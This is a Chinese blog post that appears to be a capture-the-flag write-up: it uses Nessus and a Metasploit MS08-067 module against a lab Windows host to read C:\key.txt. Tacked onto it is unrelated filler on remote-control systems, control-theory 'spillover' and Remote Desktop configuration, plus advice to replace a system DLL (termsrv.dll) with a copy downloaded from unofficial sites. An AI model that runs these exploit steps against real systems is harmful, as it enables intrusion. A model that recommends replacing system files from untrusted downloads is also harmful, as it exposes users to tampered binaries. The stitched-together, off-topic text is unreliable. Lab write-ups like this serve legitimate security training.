网络空间安全赛题解析-通过系统远程溢出控制目标主机

你可知这世上再难遇我

已于 2023-06-27 09:50:43 修改

阅读量215

点赞数 1

分类专栏：网络空间安全攻防案例文章标签：安全网络攻防

于 2023-06-04 16:51:42 首次发布

本文链接：https://blog.csdn.net/weixin_57099902/article/details/131034133

版权

网络空间安全攻防案例专栏收录该内容

23 篇文章 3 订阅

订阅专栏

1：题目背景

溢出漏洞是一种计算机程序的可更正性缺陷。溢出漏洞的全名：缓冲区溢出漏洞因为它是在程序执行的时候在缓冲区执行的错误代码，所以叫缓冲区溢出漏洞。

2：题目描述

现在有一台主机c盘根目录下又一个key.txt文件，需要获取里面的key来通过本关。

3：答案提交

1、提交得到的key。

2、请提交操作过程报告，报告中要包含操作的关键过程描述并附截图，以WORD方式提交。

4: 提交key

key：you win

5: 关卡环境

VPC1(虚拟PC）	工具场景：Windows XP操作系统/BT5
VPC2(虚拟PC）	Window server xp
软件描述	使用工具场景集成的工具软件，参赛者也可以上传工具软件软件到工具场景。
关卡环境描述	1、学生机与实验室网络直连 2、VPC与实验室网络直连 3、学生机与VPC物理链路连通

6：参考步骤

1.打开nessus，使用网络漏洞扫描，扫描主机192.168.102.62.

2.查看扫描结果，发现存在漏洞，基于445端口，可远程溢出。使用ms08-67漏洞攻击。

3.打开msfconsole，使用攻击模块：

Use exploit/windows/smb/ms08_067_netapi

设置目标ip：set RHOST 192.168.102.62

开始攻击：exploit

4.成功攻击后输入cat c:\\key.txt 显示c盘下的key.txt文件，得到key:you win .

基本介绍

定义

利用远程控制技术实现对远端设备进行操作的一种软件系统。 [1]

系统简介

远程控制系统是一种基于互联网技术的软件系统，通常通过网络才能进行。为了实现计算机远程控制，应保证在可用的网络中存在两台或多台电脑终端，网络包含有局域网、万维网，还有一些软件可以利用电脑中的COM或LPT口开展远程控制。 [1]

远程控制系统往往包含客户端程序(Client)和受控端程序(Server)两部分。在实际操作中，应始终确保两个软件程序可以持续稳定的运行，在服务协议的作用下，借助于不同远程控制功能可以对远程控制命令进行发送，同时还能对受控端计算机应用程序的运行情况进行控制。 [1]

技术原理

远程控制系统主要由计算机网络远程控制技术作为技术支撑，其主要有有WAN、LAN、电话拨号以及互联网接入4种接入模式，并且主要通过TCP/IP协议去完成，在计算机客户端和服务器之间建立有效连接，获得实时反馈，实现控制信息的流通、传输以及控制管理。计算机网络远程控制技术的原理就是在多台计算机之间建立一个数据交互通道，实现数据交流和传递。 [1]

应用系统组成

远程控制系统规模化的应用主要依托于主控网络、受控网络和通信协议等，多方的协同合作才能高效、安全的完成数据信息传递，准确下达运行指令，实现现对客户端多台计算机或者接入设备的远程控制与管理。 [1]

主控网络/主控计算机

主控网络/主控计算机主要承担指令的输入和处理，并将参数以及反馈信息在受控计算机显示出来的工作，其又分为集中管理结构和分散管理结构。前者安装成本比较大，耗费时间很长，会加大资源共享的难度，但是操作简单、容易。后者具有很高的安全性，并且应用可靠，即使其中某些环节出现问题也不会对整个物联网计算机网络的运行造成严重干扰，不会导致计算机网络运行瘫痪。 [1]

受控网络/受控计算机

受控网络/受控计算机需要在软件和硬件作用下完成远程控制操作，提供远程控制服务。受控网络系统的构建主要依托于计算机中心，是一种数据集合的控制系统。在受控网络实践应用方面，必须按照一定的操作步骤才能获取相应的数据信息服务，并将数据信息内容通过网络向主控端进行远程传输。 [1]

通信协议

远程控制系统常用的通信协议包括TCP协议和IP协议，其中TCP协议有固定的标准，且具有很高的安全性，可以保持长时间的系统运行稳定，但其缺点是它在应用过程中需要占用大量资源，从而降低计算机网络系统的处理效率；IP协议则通常被应用在多个终端网络上，可以在提供网络服务的同时处理数据；此外还有一种协议是将TCP协议和IP协议集合在一起，合成TCP/IP协议，兼具二者的特点。 [1]

技术优势

远程控制系统采用的数据传输方式往往不同于传统的数据传输方式，其主要通过传输主控端计算机的外设指令来达成远程控制的目的，这一特性使其在兼容性上具备一定的技术优势，可以实现跨系统、跨平台的远程控制。 [1]

以向日葵远程控制为例，商业化的远程控制系统往往利用了这一技术优势实现了包括Windows、macOS、Android、iOS、Linux在内的跨系统跨平台远程控制。 [1]

应用领域

在企业中的应用

企业发展过程中，如果内部设备出现问题，无法保证生产质量，现场技术人员无法及时提出解决措施时，可以通过远程控制系统与生产商建立有效的沟通与交流，将实际情况进行表述后立即给出具有针对性的解决措施；此外，企业还可以合理利用远程控制系统实现各个部门相互之间的有效连接和资源共享，从而做到节约资源和提升工作效率。 [1]

在商业中的应用

远程控制系统在商业领域的应用主要集中在软/硬件的售后服务以及TO B软件服务方面，主要涵盖远程办公、远程教育、远程维护、远程协助等领域。 [1]

在工业中的应用

计算机通信与网络远程控制技术在工业中的应用，对工业发展具有非常重要的影响和作用。现该技术在工业系统内部数据采集、数据处理以及系统的监测等环节，都已经获得了一定的发展成效，逐渐成熟，有利于工业生产体系、管理体系在实际应用过程中的效果得到强化。其中具有代表性也最为广泛的应用包括工业物联网设备的远程控制以及根据系统误差运用比例、积分和微分计算生产控制量并调节工程生产量的PID控制。 [1]

控制溢出

控制溢出(control spillover)由于无穷维系统用有穷维系统逼近所引起的控制信号对残差系统的作用.在工程实践中，无穷维系统常用有穷维近似模型代替，并基于这种有穷维模型设计反馈控制器.

控制溢出(control spillover)由于无穷维系统用有穷维系统逼近所引起的控制信号对残差系统的作用.在工程实践中，无穷维系统常用有穷维近似模型代替，并基于这种有穷维模型设计反馈控制器.例如，考虑无穷维希尔伯特空间H中的线性系统

这里的残差子系统(3)中出现的Bku(t)项称为控制溢出，而(4)中出现的CKxK }t)项则称为观测溢出.通常人们基于有穷维模型(5)设计反馈控制器.显然，反馈控制器正是通过控制溢出和观测溢出进人残差方程(4)而发生作用一般地，由于控制溢出和观测溢出的存在，基于有穷维近似模型(5)设计的反馈控制器未必能保证无穷维系统(1)稳定.因此在设计控制器时必须考虑控制溢出和观测溢出的影响.

配置应用

远程桌面WEB连接是ACTIVEX控件，该控件实际上提供了与完整终端服务客户端相同的功能，但它旨在通过 WEB 传递该功能。嵌入网页时，即使用户的计算机上并未安装完整的远程桌面连接客户端，远程桌面 WEB 连接也可以作为与终端服务器连接的客户端会话的宿主。（以WINDOWS SERVER 2003为例）

一、必要组件安装

打开“控制面板”→“添加或删除程序”→“添加或删除Windows组件”→“应用程序服务器”→“详细信息…”→“Internet信息服务（IIS）”→“详细信息…”→“万维网服务”→“详细信息…”→勾选“远程桌面Web连接”→连点三个“确定”→“下一步”等待完成。

二、启用或禁用远程连接

1、打开控制面板中的系统。

2、在“远程”选项卡上，选中或清除“允许用户远程连接到您的计算机”复选框。单击“选择远程用户…”，在随后出现的对话框中添加或删除用户，单击“确定”（两次）。

三、在客户端应用

在“开始”→“运行”，在运行框中键入“HTTP://服务器/TSWEB”→“确定”，若是第一次在本客户端使用，会要求下载ActiveX 控件，在“服务器”后的文本框中键入服务器名，在“大小”后的下拉列表中选择远程桌面的分辨率，请选择“全屏”，（否则远程桌面会显示在浏览器中），回车后即可看到登录窗口，键入用户名与密码即可进入远程桌面。其它就同使用本地机一样。若要退出，请选择“注销”，若一会儿后还要进入，请选择“断开”，再进入时方法同前。当然如果权限足够大，还可选择“重新启动”、“关机”。注意在使用时，不要直接关掉“远程桌机Web连接”的浏览器窗口，否则远程桌面相当于“断开”，并未注销。

四、终端服务配置

1、请依次单击“开始”和“控制面板”，双击“管理工具”，再双击“终端服务配置”。在控制台树中，单击“连接”。在详细信息窗格中，右键单击要配置客户端设备映射的连接，然后单击“属性”。若要使远程桌面也成为多媒体，请在“客户端设置”选项卡下选中“颜色深度的最大值”，并在下拉列表中选择适当的值。“禁用下列项目”下，请不要选中“音频映射”，以使远程桌面也能播放音乐。

2、默认的登录名设置

3、在“Internet 信息服务（IIS）管理器”下查找到TSWEB虚拟目录的具体位置，修改Default.htm文件，就不需要每次填入服务器名。用记事本打开Default.htm，找到input name=“Server”，修改Value=“服务器名或IP地址”，保存退出。

使用方法

使用远程桌面连接的方法很简单，因为一旦连接到服务器上就和操作本地计算机一样了。所以要讲解的就是连接操作。如何连接到开启了远程桌面功能的计算机呢。我们需要远程桌面连接登录器。

（1）WINDOWS XP和2003操作系统：

这两个系统将远程桌面连接程序内置到附件中，我们不用安装任何程序就可以使用远程桌面连接。

第一步：通过任务栏的“开始→程序→附件→通讯→远程桌面连接”来启动登录程序(命令行运行：mstsc)

第二步：在界面中的“计算机”处输入开启了远程桌面功能的计算机IP地址。

第三步：点击“连接”按钮后会出现一个“登陆到Windows”的对话框，注意：这时在输入对方电脑的用户名及密码（如没密码要创建一个密码）点“确定”，我们就可以成功登录到该计算机上了，连接上去后，和操作自己计算机一样方便一样快捷。（对方的机要开启了允许远程连接到此计算机，具体做法是，我的电脑→属性→远程→远程桌面，把勾打上.确定）

（2）其他WINDOWS操作系统：

2000及以前的WINDOWS中系统没有将登录工具放到附件中，我们有两个方法获得登录器并实现远程桌面的连接功能。

方法一：使用XP光盘登录器——MSRDPCLI

在XP系统光盘盘符下\SUPPORT\TOOLS目录有一个叫做MSRDPCLI.exe的程序，该程序实际上是一个远程桌面连接登录器，在WIN98/2000机器上运行XP光盘目录下的msrdpcli.exe。将自动安装远程桌面连接程序。安装过程非常简单，一路“下一步”即可。完毕以后通过“开始→程序→附件→通讯→远程桌面连接”就可以登录网络上开启远程桌面功能的计算机了。

方法二：第三方登录器

实际上网络中有很多站点都提供了远程桌面登录器的下载，我们在98系统或2000系统上下载该登录器就可以完成登录远程桌面的功能。

远程桌面

系统自带的远程桌面连接

远程桌面是微软公司为了方便网络管理员管理维护服务器而推出的一项服务。从windows 2000 server版本开始引入，网络管理员使用远程桌面连接程序连接到网络任意一台开启了远程桌面控制功能的计算机上，就好比自己操作该计算机一样，运行程序，维护数据库等。

桌面端口

3389端口，这一端口最好不要开，也就是说不要开启远程桌面，因为，HACKER会通过这一端口进入您的计算机，种植木马，如今我们的计算机安全意识越来越强，开放135端口的计算机越来越少，所以HACKER们就希望通过这一端口抓肉鸡。

可以通过注册表或者软件来修改远程桌面端口，修改远程桌面端口需要两个步骤：

1、打开注册表 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]，修改右边PortNamber的值，其默认值是3389，修改成所希望的端口即可，例如3309

2、再打开注册表 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set\Control\Tenninal Server\WinStations\RDP-Tcp]，再一次修改右边PortNumber的值，其默认值是3389，修改成所希望的端口即可，例如3309

修改完后之后刷新注册表，如果有防火墙需要做例外。做过端口过滤，需要开放修改过的端口。

多人登陆

在Windows XP中，远程桌面只能一个用户登陆，这样在某些时候其实是不方便的，不过我们可以通过以下办法实现多用户使用远程桌面登陆。

打开 Windows XP Pro SP2 远程桌面（远程协助）的多用户支持 Enable Concurrent Sessions

主要分为三步

1. 打开多用户支持(注册表 regedit)

2. 替换 termsvr.dll

3. 更改用户登录或注销的方式：使用欢迎屏幕，使用快速用户切换

控制面板→用户账户→更改用户登录或注销的方式

1. 通过注册表打开多用户支持

将以下内容复制到记事本，保存成*.reg文件，然后打开保存的文件导入注册表即可

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core]

"EnableConcurrentSessions"=dword:00000001

也可以使用命令行完成，将以下内容复制到记事本，粘贴到记事本保存成*.bat文件，然后打开保存的文件即可完成

@echo off

setlocal

set regkey="HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core"

reg add %regkey% /v EnableConcurrentSessions /T REG_DWORD /D 1 /f

endlocal

还有一种方式是

点“开始”菜单，点运行，在弹出的对话框中，键入REGEDIT然后按回车打开注册表编辑器，在注册表中找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Licensing Core，建立一个类型为DWORD的新键，键名为"EnableConcurrentSessions"，键值为“1”。

2. 替换系统中的termsvr.dll

从

http://www.x2009cn/wp-content/uploads/257/25725/2008/08/termsrv.rar (主站)

http://media-002.yo2cdncom/wp-content/uploads/257/25725/2008/08/termsrv.rar (镜像站点)

下载到termsrv.dll文件

替换两处

C:\WINDOWS\system32\dllcache\termsrv.dll

C:\WINDOWS\system32\termsrv.dll

系统应该会提示文件使用中无法替换，因为文件使用中，最简单的办法就是先把这两个文件改个名字（先改C:\WINDOWS\system32\dllcache\termsrv.dll的文件名，然后再改C:\WINDOWS\system32\termsrv.dll的，顺序不能错，否则会自动恢复），改名后系统可能会提示系统文件被修改，不用理它，按取消再按确定就可以了，然后把下载到的文件解压到相应的位置即可.

3.同上方法，更改用户登录或注销的方式：使用欢迎屏幕，使用快速用户切换

更改方法：打开控制面板→打开用户账户→点更改用户登录或注销的方式

勾选“使用欢迎屏幕”和“使用快速用户切换”，点应用选项。然后重新启动电脑即可完成操作。

相关系统服务（Related OS Services）：

TermService

Terminal Services

允许多位用户连接并控制一台机器，并且在远程计算机上显示桌面和应用程序。

这是远程桌面(包括管理员的远程桌面)、快速用户转换、远程协助和终端服务器的基础结构。

FastUserSwitchingCompatibility

Fast User Switching Compatibility

为在多用户下需要协助的应用程序提供管理。

PS：这样设置之后系统就可以用多个用户进行远程桌面登陆了，但是在测试中发现，这样仅仅能登陆2个不同用户名的用户，当登陆第三个时，就会提示要断开已经登陆的其中一个了，不过对于我们而言，通常已经够用了。